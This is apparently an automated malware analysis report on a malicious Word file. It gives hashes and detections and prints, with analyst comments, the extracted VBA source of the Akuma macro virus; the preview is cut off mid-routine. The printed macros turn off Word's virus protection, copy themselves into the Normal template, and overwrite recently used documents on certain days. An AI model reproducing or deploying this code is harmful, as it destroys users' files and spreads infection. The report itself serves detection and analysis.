Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6faff396ceb44d7…

MALICIOUS

Office (OLE)

60.5 KB Created: 1999-08-07 04:29:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 721d7713a9addf208a8a43eeaec09b54 SHA-1: ef5497ab8637b279dc332eff7a980440dc904ab2 SHA-256: e6faff396ceb44d7650a134456a59fd77eb3d693bd5fad0609d473519070b877
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code as soon as a document is opened. The script first removes any existing copies of its own routines from the Normal template and the active document, then opens 'c:\cont.dbl' for output and writes its routines into it, suggesting the file is a staging copy of the macro code used by the infection routine (AkumaInfect) rather than a downloaded payload; no network activity is visible in the extracted script. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Doc.Trojan.Akuma-2' further indicate malicious intent.

Heuristics 3

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21353 bytes
SHA-256: cbddabe23e6d0af180376676213c27fc47cc06ac7e30bde12ed2b0047b3d1352
Detection
ClamAV: Doc.Trojan.Akuma-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
'Akuma
' Analyst note: Word auto-macro, runs as soon as the document is opened.
' Visible behaviour in this excerpt: silence Word's safety prompts, strip any
' existing copies of the Akuma routines from the Normal template and from this
' document, write the routines to a staging file (c:\cont.dbl), call
' AkumaInfect, delete the staging file, then re-save the document.
' The bodies of AkumaClear, AkumaWrite and AkumaInfect are not shown here, so
' their exact effect is inferred from the call sites only.
' Host indicators for detection: Options.VirusProtection set to False,
' creation/deletion of c:\cont.dbl, modification of the Normal template's
' VBProject.
    On Error Resume Next                   ' every failure below is silently ignored
    stato = ActiveDocument.Saved           ' remembered so the "dirty" flag can be restored at the end
    Application.EnableCancelKey = Not -1   ' Not -1 evaluates to 0: the cancel key is disabled while the macro runs
    With Options
        .ConfirmConversions = False
        .VirusProtection = False           ' disables Word's macro-virus warning — the strongest indicator in this block
        .SaveNormalPrompt = False          ' changes to Normal.dot are saved without prompting the user
    End With
    Application.DisplayRecentFiles = True
    RecentFiles.Maximum = 9                ' the recent-files list is consumed later by Document_Close
    ' First target: module 1 of the Normal (global) template — the usual home
    ' of a persistent Word macro virus. Presumably each AkumaClear call removes
    ' a routine whose header matches the string (body not shown).
    Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
    db = AkumaClear(bry, "Private Sub Document_Close()")
    db = AkumaClear(bry, "Private Sub Document_Open()")
    db = AkumaClear(bry, "Private Function AkumaFind(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaClear(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaWrite(StartM)")
    db = AkumaClear(bry, "Private Function AkumaInfect()")
    db = AkumaClear(bry, "Sub Document_Close()")
    db = AkumaClear(bry, "Sub Document_Open()")
    ' Second target: module 1 of the document itself, same routine list.
    Set bry = ActiveDocument.VBProject.VBComponents.Item(1)
    db = AkumaClear(bry, "Private Sub Document_Close()")
    db = AkumaClear(bry, "Private Sub Document_Open()")
    db = AkumaClear(bry, "Private Function AkumaFind(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaClear(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaWrite(StartM)")
    db = AkumaClear(bry, "Private Function AkumaInfect()")
    db = AkumaClear(bry, "Sub Document_Close()")
    db = AkumaClear(bry, "Sub Document_Open()")
    ' Staging file: clear attributes and delete any leftover copy, then create
    ' it fresh as file #1. The six AkumaWrite calls presumably dump the source
    ' of each named routine into #1 (body not shown).
    SetAttr "c:\cont.dbl", vbNormal
    Kill "c:\cont.dbl"
    Open "c:\cont.dbl" For Output As #1
    db = AkumaWrite("Private Sub Document_Open()")
    db = AkumaWrite("Private Sub Document_Close()")
    db = AkumaWrite("Private Function AkumaFind(DoveM, StartM)")
    db = AkumaWrite("Private Function AkumaClear(DoveM, StartM)")
    db = AkumaWrite("Private Function AkumaWrite(StartM)")
    db = AkumaWrite("Private Function AkumaInfect()")
    Close #1
    SetAttr "c:\cont.dbl", vbNormal
    AkumaInfect                            ' infection routine — body not in this excerpt; the staging file exists while it runs
    Kill "c:\cont.dbl"                     ' staging file removed afterwards, so it is only briefly on disk
    ' Int((6 * Rnd) + 1) is uniform over 1..6, so the dialog below is shown
    ' with probability 2/6: a visible "calling card" in the document's
    ' Summary Info properties.
    Randomize
    If Int((6 * Rnd) + 1) < 3 Then
        With Dialogs(wdDialogFileSummaryInfo)
            .Title = "Akuma Macro Carrier"
            .Author = "Akuma"
            .Keywords = "Mary Bitch"
            .Execute
        End With
    End If
    ' Re-save in place unless the name starts with "Document" — presumably a
    ' new, never-saved document that has no file to write back to.
    If Left(ActiveDocument.Name, 8) <> "Document" Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    End If
    ActiveDocument.Saved = stato           ' restore the original saved state so the user sees no change
    On Error GoTo 0
End Sub

Private Sub Document_Close()
'Akuma
' Analyst note: destructive payload, triggered when the document is closed on
' the 16th, 17th or 18th day of any month.
' If c:\mary.log does not exist, every entry in Word's recent-files list that
' is not on drive A: is opened for output (truncating it) and overwritten with
' the taunt text. If c:\mary.log does exist, only a message box is shown, so
' that file acts as a marker that switches the payload to non-destructive.
' Indicators for detection: access to c:\mary.log, a burst of overwrites of
' recently used documents on days 16-18.
    On Error Resume Next                   ' per-file failures are ignored and the loop continues
    If Day(Date) >= 16 And Day(Date) <= 18 Then
        If Dir("c:\mary.log", vbArchive + vbHidden + vbReadOnly) = "" Then
            ' Iterate the recent-files list populated by Word (Document_Open
            ' raises its maximum to 9).
            For c = 1 To Application.RecentFiles.Count
                If Left(Application.RecentFiles.Item(c).Path, 3) <> "A:\" Then
                    ' Path + "\" + Item(c) relies on the item's default
                    ' property (presumably its Name) to form the full path.
                    ' "For Output" truncates the existing document.
                    Open Application.RecentFiles.Item(c).Path + "\" + Application.RecentFiles.Item(c) For Output As #1
                    Print #1, "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus." + Chr$(10) + "Mary is simply a bitch and you, " + Application.UserName + ", are a stupid jerk and lose some files." + Chr$(10) + "Have a nice day."
                    Close #1
                End If
            Next c
        Else
            ' Marker file present: same text, but displayed instead of written.
            MsgBox "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus." + Chr$(10) + "Mary is simply a bitch and you, " + Application.UserName + ", are a stupid jerk and lose some files." + Chr$(10) + "Have a nice day."
        End If
    End If
End Sub

Private Function AkumaFind(DoveM, StartM)
'Akuma
    flagaltro = False
    flagio = False
    For Count = 1 To DoveM.CodeModule.CountOfLines
        If LCase$(DoveM.CodeModule.Lines(Count, 1)) = LCase$(S
... (truncated)